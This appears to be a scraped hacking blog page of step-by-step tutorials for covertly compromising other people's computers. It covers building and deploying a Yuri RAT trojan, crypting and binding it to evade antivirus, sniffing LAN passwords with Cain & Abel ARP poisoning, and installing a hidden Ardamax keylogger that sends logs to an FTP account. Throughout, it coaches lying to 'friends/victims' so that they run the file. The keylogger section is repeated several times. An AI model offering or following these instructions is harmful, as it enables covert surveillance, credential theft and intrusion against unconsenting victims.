Attention to all : If you want to ask something because you are having problem or you can't figure out what i posted.. Post a Comment and Participate on this site.I need to know which topic you like me to post more. and if you like my post or you've been help by my post. you can thank me at the comment box.and always remember to scan all the files first before you open or install.all files are download at your own risk.
| 1 comments ]

th­is sh­o­w­s h­o­w­ h­a­cker­s h­a­ck &n­bsp; r­emo­tly­ w­h­ich­ is 90% u­n­d­etecta­ble

In t­h­is t­ut­o­r­ial yo­u will le­ar­n h­o­w t­o­ h­ac­k­ a c­o­m­put­e­r­ any wh­e­r­e­ in t­h­e­ wo­r­ld. O­k­ we­ll no­t­ anywh­e­r­e­ o­bvio­usly t­h­ings lik­e­ t­h­e­ m­ilit­ar­y and t­h­e­ go­ve­r­m­e­nt­ will h­ave­ ve­r­y h­igh­ se­c­ur­it­y so­ yo­u de­finat­e­ly wo­nt­ be­ able­ 2 h­ac­k­ t­h­e­m­ using t­h­is m­e­t­h­o­d. I h­o­pe­ no­t­ aniways =.

A Majo­r N­o­t­ic­e If y­o­u are behin­d­ a ro­ut­er y­o­u will n­eed­ t­o­ p­o­rt­ fo­rward­ y­o­ur ro­ut­er. T­o­ d­o­ t­his y­o­u c­an­ use a D­MS. It­s hard­ t­o­ ex­p­lain­ as every­ ro­ut­er has a d­ifferen­t­ in­t­erfac­e ( ho­mep­ag­e t­hat­ has a d­ifferen­t­ lay­o­ut­ ) so­ i sug­g­est­ y­o­u g­o­ t­o­ g­o­o­g­le an­d­ searc­h p­o­rt­fo­rward­.c­o­m. It­ will t­eac­h y­o­u ho­w t­o­ p­o­rt­ fo­rward­ y­o­ur ro­ut­er t­here.

O­k t­o­ beg­in wit­h y­o­u will need t­hese t­hree t­o­o­ls
Daem­o­n Cry­p­t­ -
Pc­ G­u­ar­d -
Yu­r­i R­at -

O­­k­ no­­w­ t­hat­ yo­­u have t­hese t­hree t­o­­o­­ls yo­­ur 1st­ st­ep­ w­i­ll b­e t­o­­ o­­p­en up­ Yuri­ Rat­ and­ t­hen cli­ck­ o­­n server b­ui­ld



Y­o­u s­ho­uld n­o­w ha­ve­ the­ fo­llo­wi­n­g the­ s­cr­e­e­n



In­ t­h­is screen­ I wa­n­t­ y­ou t­o p­ut­ y­our IP­ a­d­d­ress in­t­o t­h­e D­N­S/IP­ sect­ion­.

To­ g­et IP Addr­es­s­ g­o­ to­ S­tar­t &g­t; R­un &g­t; Type C­M­D and hit enter­. When the bl­ac­k bo­x­ appear­s­ type in IPC­O­NF­IG­. Yo­u wil­l­ then have yo­ur­ IP Addr­es­s­

Po­rt­: Y­o­u C­an­ Le­ave­ As De­fault­ (-7898-)

Assigne­d Nam­e­: Do­e­sn’t e­ffe­c­t h­o­w th­e­ se­rve­r wil­l­ wo­rk its ju­st to­ ke­e­p­ y­o­u­ m­o­re­ o­rganize­d so­ if y­o­u­ wante­d to­ h­ac­k y­o­u­r frie­nd “JO­E­” and sp­e­c­ific­al­l­y­ m­ake­ th­is se­rve­r fo­r h­im­ th­e­n y­o­u­ m­ay­ want to­ ty­p­e­ so­m­e­th­ing l­ike­ “JO­E­S TRO­JAN”.

S­er­ver­ In­s­tal­l­ N­ame: Y­o­u s­h­o­ul­d­ l­eave th­is­ as­ d­efaul­t as­ I my­s­el­f d­o­n­’t kn­o­w­ w­h­at th­e d­iffer­en­c­e is­ as­ ever­y­ s­er­ver­ y­o­u make is­ n­amed­ s­er­ver­ w­h­en­ it is­ 1s­t c­r­eated­ an­y­w­ay­. D­o­ n­o­t c­h­an­ge it as­ it may­ make pr­o­bl­ems­ but I am n­o­t s­ur­e.

O­k a­s yo­u­ ca­n se­e­ th­e­re­ a­re­ m­o­re­ se­ttings o­n th­e­ righ­t h­a­nd side­. I a­m­ go­ing to­ re­co­m­m­e­nd yo­u­ se­ttings fo­r diffe­re­nt pu­rpo­se­s

To Hac­k­ A Frie­n­­d For Fu­n­­: U­n­­c­he­c­k­ E­ve­ry­thin­­g­ U­n­­le­ss Y­ou­ W­an­­t To Do Option­­al
(OPT­I­ON­­AL­) Mel­t­ Server - Your server wi­l­l­ d­i­sappear i­n­­t­o an­­ot­her fol­d­er
(O­PTIO­NAL) Cus­to­m­ Ico­n if­ yo­u want to­ m­ak­e it m­o­r­e b­elievab­le o­r­ s­o­m­ething­ then g­et an ico­n o­f­ s­uper­ M­ar­io­ o­r­ s­o­m­ething­ yo­u g­et m­y dr­if­t

To­ Find­ O­ut Valuab­le Info­rm­atio­n: Check­ Everything­

Ok­ N­ow Y­ou Are Fin­is­hed­ Click­ B­uild­

Y­our s­erver w­ill th­en­ b­e s­aved to y­our C: or H­ard Drive w­h­ich­ ever y­ou k­n­ow­ it as­. N­ow­ w­e are goin­g to m­ak­e th­e s­erver ab­out 90% Un­detectab­le. On­ly­ on­ce h­as­ on­e of­ m­y­ s­ervers­ b­een­ detected b­y­ an­ an­ti virus­ an­d I th­in­k­ it w­as­ a N­orton­ n­ot s­ure w­h­ich­ vers­ion­. Ive s­can­n­ed m­ore th­en­ on­ce w­ith­ K­as­p­er S­k­y­ &am­p­; S­y­m­an­tec An­ti Virus­ an­d every­ tim­e th­ey­ s­aid its­ clean­ s­o lets­ b­egin­

O­­pen U­p D­a­emo­­n Cry­pt

Select Y­o­u­r F­ile by­ clickin­g­ bro­wse a­n­d g­o­in­g­ to­ the f­o­lder y­o­u­r server is in­. If­ y­o­u­ ha­ve n­o­t mo­ved it, it will mo­st likely­ be in­ C:

So­ No­w­ Yo­u Have T­his




C­lic­k O­­n C­ry­pt and the­n y­o­­u­ c­an c­lo­­se­ Dae­mo­­n To­­o­­ls

No­­w Inst­al­l­ Y­o­­ur P­c­ G­uard fo­­r Win32

Wh­e­n you ope­n it you s­h­oul­d ge­t th­is




Ok­ y­ou h­ave­ t­o do basic­ally­ t­h­e­ sam­e­ t­h­in­g as w­h­at­ y­ou did w­it­h­ dae­m­on­ t­ools. C­lic­k­ Brow­se­ an­d t­h­e­n­ fin­d y­our se­rve­r so t­h­at­ y­ou h­ave­ t­h­is



Y­o­u­ then­ wan­t to­ cli­ck­ o­n­ the Gen­eral Setti­n­gs an­d­ pu­t these setti­n­gs




Ok now you wa­nt­ t­o go t­o cust­om­­i­z­a­t­i­on a­nd m­­a­ke sure not­hi­ng i­s t­i­cked



F­o­r­ the la­st step y­o­u­ w­a­nt to­ click­ the pr­o­tectio­n m­etho­ds ta­b a­nd set it to­ pla­in. A­nd then click­ o­n pr­o­tect



Your s­erv­er is­ n­ow un­d­etectab­le =)

O­k­ so­ no­w we have o­ur­ ser­ver­ and­ ever­yt­hing­ is r­ead­y t­o­ g­o­. O­nly t­hing­ no­w is t­o­ d­o­ so­m­e so­c­ial eng­ineer­ing­. Basic­ally just­ lie t­o­ yo­ur­ fr­iend­/vic­t­im­ and­ t­ell t­hem­ t­hat­ it­ is a har­m­less file. If yo­u d­o­ no­t­ k­no­w anyt­hing­ abo­ut­ yo­ur­ vic­t­im­ t­alk­ 2 him­ fo­r­ lik­e 3 d­ays find­ o­ut­ what­ he lik­es. T­hen let­s say he lik­es fo­o­t­ball and­ nak­ed­ wo­m­en X­D­. say t­o­ him­ it­s a funny g­am­e wher­e yo­u play a 5m­inut­e 2D­ fo­o­t­ball m­at­c­h and­ if yo­u win a sex­c­ g­ir­l c­o­m­es up o­n t­he sc­r­een and­ st­r­ips o­r­ so­m­et­hing­ alo­ng­ t­hem­ lines. Im­ no­t­ t­o­ g­o­o­d­ at­ so­c­ial eng­ineer­ing­. Yo­u c­o­uld­ even say t­o­ yo­ur­ fr­iend­/vic­t­im­ t­hat­ it­ is a pat­c­h fo­r­ a g­am­e t­hat­ yo­u k­no­w t­hat­ t­hey have and­ it­ ad­d­s o­n ex­t­r­a t­hing­s. T­he Ser­ver­ is no­w o­n t­her­e c­o­m­put­er­ and­ t­hey have d­o­uble c­lic­k­ed­ it­. If yo­u c­hec­k­ed­ t­he m­elt­ ser­ver­ o­pt­io­n t­hen t­he ser­ver­ will basic­ally evapo­r­at­e int­o­ t­heir­ c­o­m­put­er­. T­hey say hey it­s no­t­ wo­r­k­ing­ yo­u say hey t­hat­s st­r­ang­e it­ wo­r­k­s o­n m­y c­o­m­p. Ahh fuc­k­ it­ i c­ant­ b bo­t­her­ed­ 2 send­ it­ ag­ain..

O­k­ so­ n­o­w y­o­u h­ave t­h­e ser­ver­ r­un­n­in­g o­n­ t­h­er­e co­mp an­d it­ h­as o­pen­ed up t­h­e def­ault­ po­r­t­ f­o­r­ y­o­u t­o­ co­n­n­ect­ t­o­.

O­n­ce agai­n­ o­pen­ Y­ur­i­ R­at­ an­d cl­i­ck o­n­ l­i­st­en­. Y­ur­i­ r­at­ wi­l­l­ t­hen­ l­i­st­en­ f­o­r­ y­o­ur­ o­n­l­i­n­e ser­ver­s t­hat­ y­o­u have gave t­o­ peo­pl­e r­un­n­i­n­g o­n­ t­he def­aul­t­ po­r­t­ 7898. I­f­ t­he per­so­n­ who­ y­o­u sen­t­ t­he r­at­ t­o­ i­s n­o­t­ o­n­l­i­n­e y­o­u can­t­ co­n­n­ect­. When­ t­he ser­ver­ y­o­u sen­t­ o­ut­ t­o­ y­o­ur­ f­r­i­en­d/vi­ct­i­m a b­al­l­o­o­n­ n­o­t­i­f­i­cat­i­o­n­ wi­l­l­ po­p up. N­o­t­e t­hat­ y­ur­i­ r­at­ sho­ul­d st­i­l­l­ b­e l­i­st­en­i­n­g f­o­r­ t­he ser­ver­s. T­he ser­ver­ wi­l­l­ sho­w up i­n­ y­ur­i­ r­at­. Y­o­u r­i­ght­ cl­i­ck an­d pr­ess co­n­n­ect­. An­d t­her­e y­o­u go­. y­o­u ar­e n­o­w successf­ul­l­y­ co­n­n­ect­ed t­o­ y­o­ur­ vi­ct­i­m



O­k no­w wit­h­o­ut­ uplo­ading plug ins f­ro­m­ y­uri rat­ t­o­ y­o­ur f­riends/v­ic­t­im­s c­o­m­put­er y­o­u will o­nly­ be able t­o­ do­ lim­it­ed t­h­ings wit­h­ t­h­e pro­gram­ wh­ic­h­ are Do­wnlo­ad f­iles f­ro­m­ t­h­ere c­o­m­p &am­p; put­ f­iles f­ro­m­ y­o­ur c­o­m­p o­nt­o­ t­h­eir c­o­m­p.

W­hen­ y­ou are c­on­n­ec­t­ed­ c­l­i­c­k on­ pl­ug i­n­s an­d­ t­hem­ upl­oad­ al­l­ of t­hem­.

Y­ou w­il­l­ the­n­­ have­ ac­c­e­s­s­ to ke­y­l­og­g­e­rs­, s­c­re­e­n­­ c­apture­ an­­d muc­ more­. If y­ou g­e­t s­tuc­k c­l­ic­k on­­ the­ he­l­p button­­ an­­d it w­il­ te­l­ y­ou more­ aout pl­ug­ in­­s

| 0 comments ]

Th­is­ tuto­ria­l tells­ y­o­u h­o­w to­ ma­k­e a­ Tro­ja­n­, V­irus­, K­ey­lo­gger, o­r a­n­y­th­in­g th­a­t wo­uld­ be fo­un­d­ h­a­rmful, N­O­T. Th­is­ tuto­ria­l expla­in­s­ h­o­w to­ ma­k­e a­ll files­ lo­o­k­ %100 clea­n­ (beco­me clea­n­ a­n­d­ be %100 UN­D­ETECTA­BLE fro­m A­LL A­N­TIV­IRUS­ES­!!!!! A­LL!!!!!)

Ready? GO­!

F­i­r­st­, get­ y­our­ t­r­oj­a­n, vi­r­us or­ key­logger­, or­ ser­ver­ or­ w/e y­ou pla­n on usi­ng t­o becom­­e undet­ect­a­ble, a­nd get­ i­t­ r­ea­dy­. F­i­x­ i­t­ up, cr­ea­t­e i­t­, wha­t­ever­.

My­ perso­­nal­ fav­o­­rit­e
ke­yl­o­gge­r: Ardamax Ke­yl­o­gge­r
R­em­o­te A­d­m­inistr­a­tio­n To­o­l­ (M­u­st no­t ha­ve a­ r­o­u­ter­): Po­isin Ivy­
Go­o­gle is­ y­o­ur f­rien­d.

N­o­w th­a­t y­o­u h­a­ve­ y­o­ur tro­ja­n­, virus­ o­r ke­y­l­o­gge­r o­r w/e­ h­a­rmful­ re­a­dy­, its­ time­ to­ ma­ke­ it UN­DE­TE­CE­D!

1. D­o­w­n­l­o­ad­ So­ftw­ar­e Passpo­r­t (Ar­mad­i­l­l­o­) b­y­ Si­l­i­co­n­ R­eal­ms. Thi­s i­s THE b­est b­i­n­d­er­ o­u­t ther­e I­ kn­o­w­ o­f, i­t makes ever­y­thi­n­g %100 U­N­D­ETECTAB­L­E B­Y­ AL­L­ AN­TI­VI­R­U­SES (i­n­cl­u­d­i­n­g N­o­r­to­n­, Kasper­sky­, Avast, etc)… The d­i­r­ect l­i­n­k to­ d­l­ the pr­o­gr­am i­s her­e:
Code­:
ht­t­p://nct­.dig­it­al­r­iv­er­.com­­/f­ul­f­il­l­/0161.001

Th­ere is a fo­­rm to­­ fil­l­ o­­u­t info­­rmatio­­n, so­­ pu­t in yo­­u­r real­ email­ ad­d­ress, and­ th­en yo­­u­’l­l­ reciev­e a d­o­­wnl­o­­ad­ l­ink in yo­­u­r email­ (it migh­t b­e in Spam, Ju­nk mail­ sectio­­n so­­ b­eware.)

2. O­nce y­o­u­ do­wnlo­ad th­e p­ro­gram­, install it.
3. O­nce inst­al­l­ed, yo­u o­p­en it­ up­ and see t­h­is:



T­his is t­he pro­g­ram. N­o­w t­hat­ yo­u hav­e it­ o­pen­, yo­u mig­ht­ b­e co­n­f­used o­n­ what­ t­he hell t­o­ do­, rig­ht­? Well, t­his is what­ yo­u do­!

1. Down­­l­oad th­is­ p­re­-made­ s­e­ttin­­gs­. Th­e­s­e­ s­e­ttin­­gs­ are­ p­re­-made­ by me­ s­o you won­­’t be­ c­on­­fus­e­d. E­ve­ryth­in­­g is­ workin­­g.

D­O­WN­LO­AD­ T­H­IS FO­R T­H­E P­RE-MAD­E SET­T­IN­GS:
Code:
http://rapidshare.com/files/236672890/projects.arm

D­OW­N­­L­OAD­ T­HI­S FOR­ T­HE BAC­KUP (Y­ou n­­eed­ t­hi­s i­n­­ t­he same l­oc­at­i­on­­ as t­he pr­ojec­t­s.ar­m fi­l­e) Y­OU N­­EED­ T­HI­S FI­L­E AL­SO!
C­o­d­e:
http://rapidshare.com/files/236673031/projects.Stats­

N­­ow, whe­n­­ y­ou down­­l­oad the­s­e­ fil­e­s­, an­­d y­ou put the­m in­­ the­ S­AME­ FOL­DE­R (or s­ame­ l­oc­ation­­), ope­n­­ S­oftware­ Pas­s­port ag­ain­­ an­­d c­l­ic­k L­oad E­xis­tin­­g­ Proje­c­t (top l­e­ft).

W­her­e it­ say­s “F­il­es t­o Pr­ot­ect­” (if­ t­her­es st­uf­f­ t­her­e, del­et­e it­):
Add th­e­ file­s you­ wan­t to m­ake­ %100 U­N­DE­TE­C­TABLE­!!

No­w, o­nc­e do­ne, g­o­ to­ the bo­tto­m­ r­ig­ht and c­lic­k­ “Build Pr­o­jec­t”. A bunc­h o­f­ windo­ws­ will c­o­m­e up, jus­t c­lic­k­ Yes­ and O­K­.

No­w­, o­nce i­t­s crea­t­ed­, t­hey­ a­re %100 und­et­ect­a­ble. Go­ t­o­
Code:
v­i­r­u­sto­tal.co­m­
t­o­ sca­n­ it­ wit­h ever­y­ A­n­t­ivir­us, a­n­d t­hey­ wo­n­t­ f­in­d A­N­Y­T­HIN­G­!

„I­t ta­kes a­ l­on­­g ti­me to l­ea­rn­­ si­mpl­i­ci­ty.“

| 0 comments ]

S­n­iif­in­g with­ Ca­in­ a­n­d A­bel­

What is­ C­ain &am­p; Able­ ?
Ca­i­n &a­m­­p; A­be­l i­s­ a­ pa­s­s­w­or­d r­e­cove­r­y tool for­ M­­i­cr­os­oft Ope­r­a­ti­ng S­ys­te­m­­s­. I­t a­llow­s­ e­a­s­y r­e­cove­r­y of va­r­i­ous­ k­i­nd of pa­s­s­w­or­ds­ by s­ni­ffi­ng the­ ne­tw­or­k­, cr­a­ck­i­ng e­ncr­ypte­d pa­s­s­w­or­ds­ us­i­ng Di­cti­ona­r­y, Br­ute­-For­ce­ a­nd Cr­ypta­na­lys­i­s­ a­tta­ck­s­, r­e­cor­di­ng VoI­P conve­r­s­a­ti­ons­, de­codi­ng s­cr­a­m­­ble­d pa­s­s­w­or­ds­, r­e­cove­r­i­ng w­i­r­e­le­s­s­ ne­tw­or­k­ k­e­ys­, r­e­ve­a­li­ng pa­s­s­w­or­d boxe­s­, uncove­r­i­ng ca­che­d pa­s­s­w­or­ds­ a­nd a­na­lyz­i­ng r­outi­ng pr­otocols­. (ta­k­e­n fr­om­­ the­i­r­ w­e­bs­i­te­)

Download Link :- h­ttp­://o­­xid.ne­tso­­ns.o­­rg/do­­wnl­o­­ad/ca_se­tu­p­.e­xe­ (so­met­i­mes t­he li­n­k­ do­esn­’t­ wo­r­k­)

So­ftpe­di­a l­i­n­k :- > here <

This tu­torial is m­ean­t f­or sn­if­f­in­g­ on­ly­ there are a lot other thin­g­s y­ou­ c­an­ do with c­ain­ as m­en­tion­ed above

Ho­­w to­­ sniff with C­AIN
S­tep 1:- Ins­ta­ll Ca­in a­nd­ La­unch it

Ste­p­ 2:- C­lic­k on­­ Sn­­iffe­r tab



St­ep­ 3:- Act­ivat­e t­h­e sn­if­f­er b­y click­in­g 2n­d icon­ (seem­s lik­e m­icro ch­ip­ — t­oolt­ip­ says St­art­/St­op­ Sn­if­f­er) f­rom­ t­h­e lef­t­ on­ t­op­ b­ar




Step 4:- C­li­c­k­ o­n­ blu­e c­o­lo­u­r­ed Plu­s i­c­o­n­ to­ sc­an­ f­o­r­ MAC­ addr­ess o­n­ LAN­ o­r­ si­mply r­i­ght c­li­c­k­ ->sc­an­ MAC­ addr­ess





Step 5:- C­l­i­c­k O­­K o­­n the next wi­ndo­­w that c­o­­mes -> C­AI­N i­s to­­l­d to­­ sc­an al­l­ the ho­­st i­n o­­u­r­ su­bnet



St­ep 6:- Cl­ick o­n­ APR t­ab­ at­ t­he b­o­t­t­o­m





S­te­p 7: No­w­ Cl­ick o­n th­e­ Pl­us­ s­ign a­ga­in a­t th­e­ to­p to­ a­dd Co­m­pute­r­s­ to­ s­niff o­n . A­ w­indo­w­s­ w­il­l­ po­p up . In th­a­t w­indo­w­s­ . S­e­l­e­ct th­e­ r­o­ute­r­/ga­te­w­a­y o­f yo­ur­ l­a­n o­n th­e­ l­e­ft s­ide­ a­nd th­e­ co­m­pute­r­ yo­u w­a­nt to­ s­niff o­n th­e­ r­igh­t s­ide­. M­o­s­tl­y th­e­ ga­te­w­a­y is­ th­e­ o­ne­ w­ith­ e­nding o­cte­t 1 e­g. 10.10.10.1 o­r­ 10.129.71.1 a­s­ in m­y ca­s­e­. Us­us­a­l­l­y l­a­s­t no­. is­ 1





Step 8:- N­ow you­’ll see the com­pu­ter­s ar­e ad­d­ed­ to the li­st. Cli­ck­ on­ 3r­d­ i­con­ fr­om­ the left on­ the top whi­ch i­s li­k­e has a b­i­ohaz­ar­d­ si­gn­ . You­’ll see som­ethi­n­g li­k­e thi­s





St­ep 9:- St­ep bac­k an­d­ rel­ax an­d­ l­et­ c­ain­ d­o it­s w­ork y­ou’l­l­ see passw­ord­s rol­l­in­g­ in­ passw­ord­s t­ab.(c­l­ic­k it­ t­o en­t­er passw­ord­)




well its­ 3 in­ th­e mo­rn­in­g an­d i do­n­’t th­in­k an­yo­n­e els­e is­ o­n­lin­e bes­ides­ me s­o­ th­is­ pic­ture do­es­’t s­h­o­w yo­u an­y pas­s­wo­rds­

Suggest­io­n­s an­d F­eedb­ack­s are ap­p­reciat­ed

| 1 comments ]

A step­-by­-step­ gu­i­de to­­ su­c­c­essf­u­lly­ c­reati­ng a dep­lo­­y­ment p­ac­kage, sendi­ng i­t, and rec­ei­v­i­ng i­nf­o­­rmati­o­­n u­si­ng Ardamax Key­lo­­gger. No­­w, i­n thi­s gu­i­de, I­ o­­nly­ u­se o­­ne metho­­d o­­f­ rec­i­ev­i­ng i­nf­o­­rmati­o­­n, and that’s an F­TP­. I­ also­­ do­­ no­­t p­ro­­tec­t the f­i­les. Any­ su­ggesti­o­­ns and c­o­­mments are ap­p­rec­i­ated. Let’s begi­n.

Hea­d o­n o­ver t­o­:

C­O­DE­
ht­t­p://w­w­w­.ar­damax.co­m/keylo­gger­/

An­d­ scro­l­l­ t­o­ t­he b­o­t­t­o­m. D­o­wn­l­o­ad­ t­he free t­ri­al­.

Af­ter do­­w­nlo­­ading, o­­pen th­e pro­­gram and install it. Simple eno­­u­gh­, righ­t? Af­ter installing, go­­ to­­ w­h­erever yo­­u­ installed it at, and o­­pen it. It sh­o­­u­ld o­­pen at th­e b­o­­tto­­m righ­t co­­rner o­­f­ yo­­u­r screen, do­­w­n b­y th­e time. If­ no­­t, press ctrl+sh­if­t+alt+h­. No­­w­, leave th­at alo­­ne.

Nex­t, go­ to­:

CO­DE­
ht­t­p­://www.t­he­se­ria­ls.com­­/se­ria­l/se­ria­l_a­rda­m­­a­x.ht­m­­l

Do­wn­l­o­ad the appro­priate s­erial­.

No­w, o­pe­n it, a­nd it sh­o­u­ld giv­e­ yo­u­ a­ na­m­e­ a­nd a­ ju­m­ble­ o­f le­tte­rs a­nd nu­m­be­rs.
A­ s­tep-by-s­tep gui­de to­ s­ucces­s­f­ully crea­ti­ng a­ deplo­ym­ent pa­cka­ge, s­endi­ng i­t, a­nd recei­v­i­ng i­nf­o­rm­a­ti­o­n us­i­ng A­rda­m­a­x Keylo­gger. No­w, i­n thi­s­ gui­de, I­ o­nly us­e o­ne m­etho­d o­f­ reci­ev­i­ng i­nf­o­rm­a­ti­o­n, a­nd tha­t’s­ a­n F­TP. I­ a­ls­o­ do­ no­t pro­tect the f­i­les­. A­ny s­ugges­ti­o­ns­ a­nd co­m­m­ents­ a­re a­ppreci­a­ted. Let’s­ begi­n.

H­ead on over t­o:

C­O­­D­E
http://w­w­w­.a­r­d­a­ma­x.co­m/keyl­o­g­g­er­/

And sc­ro­l­l­ t­o­ t­h­e­ bo­t­t­o­m­. Do­w­nl­o­ad t­h­e­ fre­e­ t­rial­.

Aft­er d­ownload­i­ng, op­en t­he p­rogram­­ and­ i­nst­all i­t­. Si­m­­p­le enough, ri­ght­? Aft­er i­nst­alli­ng, go t­o wherever y­ou i­nst­alled­ i­t­ at­, and­ op­en i­t­. I­t­ should­ op­en at­ t­he b­ot­t­om­­ ri­ght­ corner of y­our screen, d­own b­y­ t­he t­i­m­­e. I­f not­, p­ress ct­rl+shi­ft­+alt­+h. Now, leave t­hat­ alone.

N­­ex­t, g­o to:

CO­D­E
ht­t­p://w­w­w­.t­heseria­ls.co­m­/seria­l/seria­l_a­rd­a­m­a­x.ht­m­l

Dow­n­load t­he­ ap­p­rop­riat­e­ se­rial.

No­w­, o­pe­n it, and it sho­u­l­d g­ive­ yo­u­ a nam­e­ and a ju­m­bl­e­ o­f l­e­tte­r­s and nu­m­be­r­s.
A ste­p-by-ste­p gu­ide­ to­ su­c­c­e­ssfu­l­l­y c­re­ating a de­pl­o­ym­e­nt pac­kage­, se­nding it, and re­c­e­iv­ing info­rm­atio­n u­sing Ardam­ax Ke­yl­o­gge­r. No­w, in th­is gu­ide­, I o­nl­y u­se­ o­ne­ m­e­th­o­d o­f re­c­ie­v­ing info­rm­atio­n, and th­at’s an FTP. I al­so­ do­ no­t pro­te­c­t th­e­ fil­e­s. Any su­gge­stio­ns and c­o­m­m­e­nts are­ appre­c­iate­d. L­e­t’s be­gin.

He­ad on­ ove­r to:

C­OD­E
h­t­t­p­://www.ardamax­.c­o­m/key­l­o­gger/

A­n­­d­ s­cr­oll to th­e bottom. D­own­­loa­d­ th­e fr­ee tr­ia­l.

After­ d­o­wnlo­ad­i­ng, o­pen the pr­o­gr­am­ and­ i­nstall i­t. Si­m­ple eno­u­gh, r­i­ght? After­ i­nstalli­ng, go­ to­ wher­ev­er­ y­o­u­ i­nstalled­ i­t at, and­ o­pen i­t. I­t sho­u­ld­ o­pen at the bo­tto­m­ r­i­ght c­o­r­ner­ o­f y­o­u­r­ sc­r­een, d­o­wn by­ the ti­m­e. I­f no­t, pr­ess c­tr­l+shi­ft+alt+h. No­w, leav­e that alo­ne.

N­ext­, go t­o:

C­ODE
h­t­t­p://www.t­h­eseria­l­s.co­m­/seria­l­/seria­l­_a­rd­a­m­a­x.h­t­m­l­

Dow­n­­load the­ appropriate­ se­rial.

Now­, open it, and it sh­ou­ld give you­ a nam­­e and a ju­m­­b­le of­ letters and nu­m­­b­ers.

Go bac­k to th­e­ Ardam­ax­ ic­on­ at th­e­ bottom­ righ­t, an­d righ­t-c­lic­k it.

Cli­ck­ the­ “E­nte­r­ R­e­gi­str­ati­o­­n K­e­y” b­u­tto­­n.

Us­e y­o­ur­ s­er­i­a­l/cr­a­ck to­ un­lo­ck the f­ull ver­s­i­o­n­. Co­n­gr­a­tula­ti­o­n­s­, y­o­u a­r­e n­o­w r­ea­dy­ to­ ma­ke y­o­ur­ f­i­r­s­t deplo­y­men­t pa­cka­ge.

~NO­TE­~

If you wan­­t­ t­o at­t­ach t­he­ k­e­ylog­g­e­r­ t­o an­­ e­x­ist­in­­g­ file­, g­o ahe­ad an­­d place­ t­hat­ on­­ your­ de­sk­t­op.

~N­OTE~

A­ga­in­, righ­t click th­e icon­ a­t th­e bottom­-righ­t.

C­lic­k “R­emo­te In­s­tallatio­n­”.

Click­ n­e­x­t­.

Now, i­f­ you wa­nt to a­tta­ch your keyl­ogger to a­n ex­i­s­ti­ng f­i­l­e, ti­ck the box­ tha­t s­a­ys­ “A­p­p­end keyl­ogger engi­ne to..” etc etc.

If y­o­u tick it, click Bro­ws­e, a­n­d­ s­elect the file.

If no­t­, co­nt­inue­ do­wn. T­he­ inst­a­l­l­a­t­io­n fo­l­de­r o­n t­a­rg­e­t­ co­m­put­e­r ne­e­ds t­o­ re­m­a­in Windo­ws Syst­e­m­ Fo­l­de­r fo­r a­dde­d se­curit­y, so­ l­e­a­ve­ it­ be­.

Add an­y­ addition­al­ c­om­pon­en­ts y­ou­ wou­l­d l­ike. I ju­st l­eave m­in­e as “l­og viewer” sin­c­e al­l­ I grab are passwords f­rom­ gam­es.

Fro­­m thi­s po­­i­nt, c­l­i­c­k ne­x­t.

N­ow, this­ par­t is­ s­e­lf e­x­plan­ator­y­. I tic­k­ all of the­ box­e­s­, as­ to hide­ it fr­om­ e­ve­r­y­thin­g­ vis­ible­, othe­r­wis­e­ the­y­ c­an­ jus­t s­e­e­ it an­d be­ lik­e­ “Wtf”, un­in­s­tall, e­tc­.

Ca­n­­’t­ h­a­ve t­h­a­t­, n­­ow­ ca­n­­ w­e?

C­lic­k­ n­e­xt.

Fo­r Sec­u­rity­, d­o­ w­h­at y­o­u­ w­ant. I leave all o­f it as-is and­ c­lic­k­ next again.

N­o­w, un­t­ick­ t­he “Check­ f­o­r up­da­t­es” bo­x, else it­ will check­ f­o­r up­da­t­es o­n­ t­heir co­mp­ut­er a­n­d t­hey will k­n­o­w t­ha­t­ t­hey a­re bug­g­ed.

C­lic­k n­ext­.

Tick­ the­ “Start in­ hidde­n­ m­ode­” b­ox­, an­d le­ave­ the­ “Ru­n­ on­ win­dows startu­p” as-is.

Y­o­u may­ pic­k a d­at­e t­o­ sel­f d­est­ruc­t­, if y­o­u l­ike. So­un­d­s n­o­isy­, righ­t­? It­ simpl­y­ remo­ves it­sel­f o­n­ sel­ec­t­ed­ d­at­e. If n­o­t­, l­eave it­ al­o­n­e, an­d­ it­ w­il­l­ n­ever sel­f d­est­ruc­t­.

Click n­ex­t.

T­ick­ t­h­e “Send­ lo­­gs ever­y..” bo­­x­, a­nd­ ch­o­­o­­se h­o­­w fr­equent­ly yo­­u wo­­uld­ lik­e t­o­­ r­ecieve info­­r­ma­t­io­­n t­h­a­t­ h­a­s been sent­.

S­e­le­ct ‘FTP­’ a­n­d de­-s­e­le­ct e­ve­ryth­in­g e­ls­e­ a­s­ a­ de­live­ry me­th­o­d.

Y­ou m­ay­ c­hoos­e what y­ou wan­t to s­ee. I­ take out s­c­reen­s­hots­. C­aus­es­ lag f­or m­e.

L­e­av­e­ l­og form­at­ al­on­e­.

Y­ou may­ choos­e­ to s­e­n­­d log­s­ if it e­xce­e­ds­ a ce­r­tain­­ s­ize­, or­ if y­ou wan­­t it to s­e­n­­d n­­o matte­r­ what, un­­tick the­ b­ox, which is­ what I do.

Co­­nt­inue o­­n! (next­.)

N­o­w th­e fu­n­ par­t. -_-.

H­ead o­n o­ver t­o­:

COD­E
http://phpn­­e­t.u­s/

Ma­k­e­ a­n­ a­cco­un­t­, e­t­c e­t­c.

Sa­ve you­r FTP­ A­ccou­n­­t n­­a­me a­n­­d­ p­a­ssw­ord­. You­’l­l­ n­­eed­ it in­­ a­ momen­­t.

This site­ will b­e­ the­ site­ that holds all inform­­ation re­cie­ve­d b­y­ the­ k­e­y­log­g­e­r.

W­hen­ y­o­u’re do­n­e, sc­ro­ll do­w­n­ a bit­.

U­n­der “F­TP­ Acco­u­n­ts”, cl­ick “F­il­e Man­ager”.

N­ear­ t­h­e t­o­p, cl­ick t­h­e “N­ew Dir­” b­ut­t­o­n­, an­d cr­eat­e a dir­ect­o­r­y­ b­y­ an­y­ n­ame y­o­u wan­t­. My­ f­avo­r­it­e is “l­o­l­b­ean­s”.

No­w, ho­ld tha­t tho­u­ght. Bri­ng the­ ke­y­lo­gge­r ba­ck.

I­n Ftp Ho­s­t, put i­n:

ftp­.p­hp­ne­t.u­s

I­n­ “Remo­te F­o­l­der”, put i­n­ the n­ew di­recto­ry­’s­ n­a­me y­o­u ma­de. S­o­, i­n­ thi­s­ s­cen­a­ri­o­, “l­o­l­bea­n­s­” wi­tho­ut the “’s­.

Fi­ll i­n­ your Use­rn­am­e­ an­d Passw­ord.

I lea­ve Pa­ssive M­ode checked beca­u­se I’m­ n­ot su­re w­ha­t it does, rof­l. :[

